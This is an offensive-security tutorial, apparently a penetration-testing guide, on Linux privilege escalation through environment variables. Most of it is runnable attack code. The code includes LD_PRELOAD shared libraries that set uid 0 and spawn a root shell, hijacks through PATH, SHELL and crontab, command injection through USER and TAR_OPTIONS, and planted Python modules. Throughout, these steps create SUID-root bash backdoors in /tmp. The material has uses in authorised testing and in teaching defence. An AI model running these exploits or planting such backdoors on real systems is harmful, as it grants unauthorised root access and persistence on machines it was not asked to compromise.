Environment variable exploitation

Understanding Environment Variable Exploitation

What Makes Environment Variables Dangerous

Environment variables can be exploited when privileged programs or scripts read user-controlled environment variables without proper validation. Attackers can manipulate these variables to alter program behavior, inject malicious commands, or escalate privileges by controlling how applications execute or load resources.

The Attack Principle: Exploit scenarios where:

• SUID/SGID binaries read environment variables for configuration

• Scripts use environment variables in command execution

• Programs use variables like LD_PRELOAD for library loading

• Applications trust user-controlled environment data without validation

Why This Works: Many programs inherit the environment from their parent process. If an attacker controls environment variables and a privileged program reads them, malicious values can alter program execution flow.

Environment Variable Discovery and Enumeration

Finding Environment Variable Usage

Basic Environment Discovery:

# Display current environment
env
printenv

# Check specific important variables
echo $PATH
echo $LD_PRELOAD

# Find which variables are set
env | grep -E "(PATH|LD_|LIBRARY|PRELOAD|SHELL)"

Analyzing Binary Environment Usage:

# Check if binary reads environment variables
strings /path/to/suid_binary | grep -E "(getenv|environ|PATH|LD_)"

# Look for specific environment variable names
strings /path/to/suid_binary | grep -E "(HOME|USER|SHELL|TEMP|TMP)"

# Use strace to see environment access
strace -e getenv,execve /path/to/suid_binary 2>&1

Script Environment Analysis:

# Find scripts that use environment variables
grep -r "\$[A-Z]" /usr/local/bin/ 2>/dev/null
grep -r "getenv\|environ" /usr/bin/ 2>/dev/null

# Look for variable expansion in shell scripts
find / -name "*.sh" -exec grep -l "\$[A-Z_]" {} \; 2>/dev/null

High-Value Environment Variable Exploits

LD_PRELOAD Exploitation

Why LD_PRELOAD is Critical: Forces programs to load specified shared libraries before others, allowing function hijacking.

Basic LD_PRELOAD Exploit:

# Create malicious shared library
echo '#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}' > /tmp/shell.c

# Compile the library
gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles

# Export LD_PRELOAD and execute SUID binary
export LD_PRELOAD=/tmp/shell.so
/path/to/suid_binary

Advanced LD_PRELOAD Function Hijacking:

# Hijack specific functions like printf
echo '#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
int printf(const char *format, ...) {
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}' > /tmp/printf_hijack.c

gcc -fPIC -shared -o /tmp/printf_hijack.so /tmp/printf_hijack.c

export LD_PRELOAD=/tmp/printf_hijack.so
/path/to/vulnerable_binary

PATH Variable Exploitation

PATH Manipulation for Environment Exploitation:

# Different from path hijacking - using environment injection
# Create malicious directory
mkdir /tmp/envpath

# Create fake commands
echo '#!/bin/bash
cp /bin/bash /tmp/envbash
chmod 4755 /tmp/envbash' > /tmp/envpath/sh
chmod +x /tmp/envpath/sh

# Export PATH and execute vulnerable program
export PATH=/tmp/envpath:$PATH
/path/to/vulnerable_program

SHELL Variable Exploitation

Shell Environment Manipulation:

# If program uses system() or exec() with $SHELL
export SHELL=/tmp/malicious_shell.sh

# Create malicious shell script
echo '#!/bin/bash
cp /bin/bash /tmp/shellbash
chmod 4755 /tmp/shellbash
exec /bin/bash "$@"' > /tmp/malicious_shell.sh
chmod +x /tmp/malicious_shell.sh

# Execute vulnerable program
/path/to/vulnerable_binary

Script-Based Environment Exploitation

Shell Script Variable Injection

Identifying Vulnerable Scripts:

# Look for scripts using unvalidated environment variables
grep -r 'echo.*\$' /usr/local/bin/ 2>/dev/null
grep -r 'exec.*\$' /usr/local/bin/ 2>/dev/null
grep -r 'system.*\$' /usr/local/bin/ 2>/dev/null

Command Injection via Environment:

# If script uses: echo "Welcome $USER"
export USER='; cp /bin/bash /tmp/scriptbash; chmod 4755 /tmp/scriptbash; echo pwned'
/path/to/vulnerable_script

# If script uses: tar $TAR_OPTIONS file.tar
export TAR_OPTIONS='--to-command="/bin/bash -c \"cp /bin/bash /tmp/tarbash; chmod 4755 /tmp/tarbash\""'
/path/to/backup_script

Python Environment Exploitation

Python Path Injection:

# Manipulate Python module search path
export PYTHONPATH=/tmp/python_exploit:$PYTHONPATH

# Create malicious module
mkdir /tmp/python_exploit
echo 'import os; os.system("cp /bin/bash /tmp/python_backdoor; chmod 4755 /tmp/python_backdoor")' > /tmp/python_exploit/os.py

# Execute vulnerable Python script
python3 /path/to/suid_script.py

Python Startup File Exploitation:

# Use PYTHONSTARTUP to execute code on Python startup
echo 'import os; os.system("cp /bin/bash /tmp/pystartup; chmod 4755 /tmp/pystartup")' > /tmp/startup.py
export PYTHONSTARTUP=/tmp/startup.py

python3 /path/to/vulnerable_script.py

Cron and Service Environment Exploitation

Cron Environment Variables

Cron Job Environment Injection:

# Check cron jobs that might inherit environment
cat /etc/crontab | grep -v "^#"

# If cron job uses environment variables
# Add to user crontab with malicious environment
echo 'SHELL=/tmp/malicious_shell.sh
PATH=/tmp/malicious_path:$PATH
*/5 * * * * /path/to/cron_script' | crontab -

# Create malicious shell
echo '#!/bin/bash
cp /bin/bash /tmp/cronbash
chmod 4755 /tmp/cronbash
exec /bin/bash "$@"' > /tmp/malicious_shell.sh
chmod +x /tmp/malicious_shell.sh

Service Environment Manipulation

Systemd Service Environment:

# Check service files for environment variable usage
grep -r "Environment=" /etc/systemd/system/
grep -r "\$" /etc/systemd/system/

# If service uses EnvironmentFile
# Check if environment file is writable
find /etc -name "*.env" -writable 2>/dev/null

Real-World Exploitation Examples

Example 1: LD_PRELOAD SUID Bypass

Discovery:

# Found SUID binary that doesn't strip environment
find /usr/bin -perm -4000 -exec {} --help \; 2>/dev/null | grep -B5 -A5 "environment"

Exploitation:

# Create shared library
echo '#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0); setuid(0);
    system("/bin/bash");
}' > /tmp/preload.c

gcc -fPIC -shared -o /tmp/preload.so /tmp/preload.c -nostartfiles

# Execute with LD_PRELOAD
LD_PRELOAD=/tmp/preload.so /usr/bin/vulnerable_suid

Example 2: Script Environment Injection

Discovery:

# Found script using environment variables unsafely
cat /usr/local/bin/backup_script | grep '\$'
# Contains: tar $TAR_OPTIONS -czf backup.tar.gz /home/

Exploitation:

# Inject malicious tar options
export TAR_OPTIONS='--to-command="cp /bin/bash /tmp/backup_root; chmod 4755 /tmp/backup_root"'

# Execute vulnerable script
/usr/local/bin/backup_script

# Use created backdoor
/tmp/backup_root -p

Example 3: Python Environment Exploitation

Discovery:

# Found Python SUID script
ls -la /usr/bin/python_tool
# -rwsr-xr-x 1 root root python_tool

# Check if it uses environment
strings /usr/bin/python_tool | grep -i python

Exploitation:

# Create malicious Python module
mkdir /tmp/pyexploit
echo 'import os; os.setuid(0); os.system("/bin/bash")' > /tmp/pyexploit/sys.py

# Set Python path and execute
PYTHONPATH=/tmp/pyexploit /usr/bin/python_tool

Key Operational Considerations

Success Indicators

• Environment variables accepted by privileged programs

• Library preloading successful with LD_PRELOAD

• Command injection achieved through variable expansion

• Privilege escalation confirmed through environment manipulation

Common Failure Points

• Environment stripping by security-aware programs

• LD_PRELOAD disabled for SUID binaries (modern systems)

• Variable validation preventing injection attacks

• Restricted environments (containers, chroot) limiting exploitation

Exploitation Notes

• Custom applications more likely to trust environment variables

• Development systems often have relaxed environment security

• LD_PRELOAD most powerful but often restricted on modern systems

• Script-based services frequently vulnerable to environment injection

Environment variable exploitation remains effective against applications that trust user-controlled environment data, particularly in development environments and custom applications where security hardening may be incomplete.